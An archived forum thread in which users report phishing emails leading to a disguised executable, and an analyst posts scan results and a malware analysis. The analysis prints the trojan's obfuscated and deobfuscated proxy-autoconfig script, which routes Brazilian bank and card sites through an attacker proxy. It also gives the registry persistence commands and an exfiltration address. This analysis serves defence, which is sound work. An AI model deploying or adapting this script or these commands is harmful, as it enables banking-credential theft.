Keep getting emails from live com

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
They all link to:
microsoft.windowslive.com/*a_long_key
which seems to be a legit M$ domain

They been hacked ?

Re: Keep getting emails from live com

The clock of life is wound but once,
And no man has the power to tell
Just when the hands will stop
    At late or early hour.
Now is the only time you own,
Live, Love, Toil with a will.
Place no faith in tomorrow,
For the clock may then be Still.

Anon.

Re: Keep getting emails from live com


The clock of life is wound but once,
And no man has the power to tell
Just when the hands will stop
    At late or early hour.
Now is the only time you own,
Live, Love, Toil with a will.
Place no faith in tomorrow,
For the clock may then be Still.

Anon.

Re: Keep getting emails from live com

On Fri, 17 Jun 2011 17:23:48 -0300, Shadow wrote:

Quoted text here. Click to load it
    It was a trick to get my defenses down. I am now getting exactly
the same messages, this time leading me to a trojan called
www.youtube.com, yeah, with an executable com at the end.
    Tested at virustotal, and jotti, heuristics gets it 5/41
    Uploading to uploadmalware, for David Lipman to analyze.
    []'s

Re: Keep getting emails from live com


Quoted text here. Click to load it

Got it - Thanx !

Report to follow.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com


Quoted text here. Click to load it

http://www.virustotal.com/file-scan/report.html?id=b8c651dda606a9ba01df96da40b498db2f97062823448846abece932cfae09b2-1308592275

AhnLab-V3 2011.06.21.00 2011.06.20 Trojan/Win32.CSon
AntiVir 7.11.10.40 2011.06.20 DR/Delphi.Gen
BitDefender 7.2 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
CAT-QuickHeal 11.00 2011.06.20 (Suspicious) - DNAScan
ClamAV 0.97.0.0 2011.06.20 PUA.Packed.PECompact-1
DrWeb 5.0.2.03300 2011.06.20 Trojan.DownLoader3.35839
eSafe 7.0.17.0 2011.06.19 Suspicious File
F-Secure 9.0.16440.0 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
GData 22 2011.06.20 Gen:Trojan.Heur.niWfr1uQhClGz
Ikarus T3.1.1.104.0 2011.06.20 Trojan-Dropper.Delf
Kaspersky 9.0.0.837 2011.06.20 Trojan.Win32.Scar.ebmn
McAfee 5.400.0.1158 2011.06.20 Generic.tfr!c
McAfee-GW-Edition 2010.1D 2011.06.20 Heuristic.LooksLike.Win32.Suspicious.C!83
Norman 6.07.10 2011.06.19 W32/Obfuscated.O

gets sbmultimarcas.info/gordinha.pac
Drops:  MkVp.pac

Which has a funky script that starts with (and is only a partial display)...

function FindProxyForURL(url, host)
{
var sbr0x = "P"+""+""+"R"+""+""+"O"+""+""+"X"+""+""+"Y"+""+""+"
"+""+""+"2"+""+""+"0"+""+""+"8"+""+""+"."+""+""+"1"+""+""+"1"+""+""+"5"+""+""+"."+""+""+"2"+""+""+"2"+""+""+"4"+""+""+"."+""+""+"2"+""+""+"3"+""+""+"1"+""+""+":"+""+""+"8"+""+""+"0"+""+""+"";

  if (shExpMatch(host,
"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"."+""+""+"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"2"+""+""+"."+""+""+"b"+""+""+"b"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}

  if (shExpMatch(host,
"w"+""+""+"w"+""+""+"w"+""+""+"."+""+""+"b"+""+""+"a"+""+""+"n"+""+""+"c"+""+""+"o"+""+""+"d"+""+""+"o"+""+""+"b"+""+""+"r"+""+""+"a"+""+""+"s"+""+""+"i"+""+""+"l"+""+""+"."+""+""+"c"+""+""+"o"+""+""+"m"+""+""+"."+""+""+"b"+""+""+"r"+""+""+""))
{
     return sbr0x;
}




Which evaluates to....

function FindProxyForURL(url, host)
{
var sbr0x = "PROXY 208.115.224.231:80";

  if (shExpMatch(host, "bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www2.bb.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bancodobrasil.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "bancodobrasil.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.bancoitau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "bancoitau.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.unibanco.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "unibanco.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.uniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "uniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itauuniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itauuniclass.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itaupersonnalite.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "itaupersonnalite.com.br")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.itaupersonnalite.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "itaupersonnalite.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "www.americanexpress.com.br ")) {
     return sbr0x;
}

  if (shExpMatch(host, "americanexpress.com.br ")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.americanexpress.com")) {
     return sbr0x;
}

  if (shExpMatch(host, "americanexpress.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.credicard.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "credicard.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixa.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixa.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomica.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomica.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomica.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomica.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.caixaeconomicafederal.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "caixaeconomicafederal.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.cef.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "cef.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.cef.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "cef.gov.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradesco.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradesco.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradescoprime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradescoprime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.prime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "prime.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradesco.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradesco.com")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.bradescopj.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bradescopj.com.br")) {
     return sbr0x;
}


 if (shExpMatch(host, "www.bancoreal.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "bancoreal.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.real.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "real.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.santander.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "santander.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.banespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "banespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.santanderbanespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "santanderbanespa.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "www.banrisul.com.br")) {
     return sbr0x;
}

 if (shExpMatch(host, "banrisul.com.br")) {
     return sbr0x;
}
 if (shExpMatch(host, "banrisul.com")) {
     return sbr0x;
}
 if (shExpMatch(host, "www.banrisul.com")) {
     return sbr0x;

}
 if (shExpMatch(host, "www.americanexpress.com.br")) {
     return sbr0x;

}
 if (shExpMatch(host, "americanexpress.com.br")) {
     return sbr0x;
}
 if (shExpMatch(host, "www.americanexpress.com")) {
     return sbr0x;

}
 if (shExpMatch(host, "americanexpress.com")) {
     return sbr0x;

}
 return "DIRECT";
}



Creates a copy of its self (www.youtube.com which is an EXE executable rename to
.com) to;
C:\Unnisttall.exe

Execute:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v
CIPA /d
C:\Unnisttall.exe /t REG_SZ /f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion /v VIPA /d
C:\Unnisttall.exe /t
REG_SZ /f

Mutex:
OneCopyMutex

Posts data to...

64.31.58.228/gh.php


--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 14:30:32 -0400, "David H. Lipman"

... something or other, but all I got was:

Quoted text here. Click to load it

Was there supposed to be malware in that?

--
Rich Webb     Norfolk, VA

Re: Keep getting emails from live com


Quoted text here. Click to load it

There was no malware in that.  Presumably Avast didn't like the de-obfuscated
script.  A
script that could not cause any harm in the body of my post.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 15:21:33 -0400, "David H. Lipman"

Quoted text here. Click to load it

Roger that. Thought it was better to ask just in case it wasn't a false
positive, given how easily From lines can be spoofed. FWIW, the Avast
alert was "JS: Banker-P [Trj]."

--
Rich Webb     Norfolk, VA

Re: Keep getting emails from live com


Quoted text here. Click to load it

Quite apropos label since if you examine the script it does have to do with
banks
specifically Brazilian and it was deobfusicated from an obfuscated Javascript.



--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Re: Keep getting emails from live com

On Mon, 20 Jun 2011 14:30:32 -0400, "David H. Lipman"

Quoted text here. Click to load it
    Well, it's good to know more AV's recognize it.
    Trojan banker, via proxy.
    Has just about every Brazilian bank I've ever heard of on the
list.
    Thanks
    []'s

Re: Keep getting emails from live com


Quoted text here. Click to load it


YW ;-)

--
Dave
Multi-AV Scanning Tool - http://www.pctipp.ch/downloads/dl/35905.asp



Site Timeline